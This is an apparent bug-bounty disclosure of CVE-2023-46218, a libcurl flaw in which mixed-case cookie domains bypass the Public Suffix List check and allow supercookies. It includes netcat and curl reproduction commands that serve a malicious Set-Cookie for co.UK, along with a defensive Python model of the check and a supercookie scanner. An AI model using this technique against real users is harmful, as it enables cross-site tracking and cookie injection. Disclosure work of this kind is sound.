CVE-2023-46218: cookie mixed case PSL bypass
Medium
Vulnerability Details
## Summary:
libcurl fails to normalize the `hostname` and `cookie_domain` parameters passed to the `psl_is_cookie_domain_acceptable` function. As a result, a malicious site can set a supercookie if the victim requests a URL whose hostname contains any uppercase characters in its domain part.
The libpsl `psl_is_cookie_domain_acceptable` documentation (https://rockdaboot.github.io/libpsl/libpsl-Public-Suffix-List-functions.html#psl-is-cookie-domain-acceptable) says the following:
```
Use helper function psl_str_to_utf8lower() for normalization of hostname and cookie_domain .
```
This is not done correctly, and hence domains with uppercase characters bypass the PSL check. Note that curl itself later ignores the cookie domain's capitalization and will match even an all-lowercase hostname against the stored supercookie's mixed-case domain.
It is also worth noting that the request `Host` header reveals the mixed case used, which allows the attacker to prepare the correct `Set-Cookie` domain for the attack.
## Steps To Reproduce:
1. `echo -ne "HTTP/1.1 200 OK\r\nSet-Cookie: super=oops; domain=co.UK\r\nContent-Length: 0\r\n" | nc -v -l -q 1 -p 8888`
2. `curl -v -c c.txt --resolve test.co.uk:8888:testserverip http://test.co.UK:8888`
3. `nc -v -l -p 7777`
4. `curl -v -b c.txt --resolve other.co.uk:7777:testserverip http://other.co.uk:7777`
Note that the `super` cookie is sent to the `other.co.uk` site. In fact, it will now be sent to any `.co.uk` host.
The generated cookie file:
```
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
.co.UK TRUE / FALSE 0 super oops
```
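The following is an added illustration, not code from curl or libpsl: a minimal model of the PSL cookie-domain check that shows why the caller must lowercase both `hostname` and `cookie_domain` before the lookup (the summary above), plus a scanner that flags supercookies already stored in a Netscape cookie jar like the one shown. The suffix list, the function names and the sample jar are constructed for the example.

```python
# Added illustration, not code from curl or libpsl: a model of the PSL
# cookie-domain check with and without normalization, and a scanner for
# supercookies already present in a Netscape-format cookie jar.

# Constructed excerpt of the Public Suffix List; entries are stored lowercase.
PUBLIC_SUFFIXES = {"uk", "co.uk", "com", "github.io"}


def is_public_suffix(domain: str) -> bool:
    """Exact, case-sensitive lookup, as a suffix-list library performs it."""
    return domain in PUBLIC_SUFFIXES


def cookie_domain_acceptable_unnormalized(hostname: str, cookie_domain: str) -> bool:
    """Model of the check when the caller skips normalization (the bug):
    'co.UK' is not found in the list, so the cookie is accepted for the suffix."""
    cookie_domain = cookie_domain.lstrip(".")
    if is_public_suffix(cookie_domain):
        return False
    return hostname == cookie_domain or hostname.endswith("." + cookie_domain)


def cookie_domain_acceptable_normalized(hostname: str, cookie_domain: str) -> bool:
    """Same check after lowercasing both inputs, as the libpsl docs require."""
    return cookie_domain_acceptable_unnormalized(hostname.lower(), cookie_domain.lower())


def find_supercookies(cookie_jar_text: str) -> list:
    """Return (domain, cookie name) pairs from a Netscape-format cookie jar whose
    domain, once normalized, is a public suffix, i.e. cookies that would be
    sent to every host under that suffix."""
    found = []
    for line in cookie_jar_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(None, 6)  # domain flag path secure expiry name [value]
        if len(fields) < 6:
            continue
        domain, name = fields[0], fields[5]
        if is_public_suffix(domain.lstrip(".").lower()):
            found.append((domain, name))
    return found


# Constructed cookie jar mirroring the one in the report (tab-separated fields).
SAMPLE_JAR = """# Netscape HTTP Cookie File
.co.UK\tTRUE\t/\tFALSE\t0\tsuper\toops
.example.com\tTRUE\t/\tFALSE\t0\tsession\tabc
"""

if __name__ == "__main__":
    print(cookie_domain_acceptable_unnormalized("test.co.UK", "co.UK"))  # True (bypassed)
    print(cookie_domain_acceptable_normalized("test.co.UK", "co.UK"))    # False (rejected)
    print(find_supercookies(SAMPLE_JAR))  # [('.co.UK', 'super')]
```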
## Impact
Bypassing supercookie protection.
Report Stats
- Report ID: 2212193
- State: Closed
- Substate: resolved
- Upvotes: 26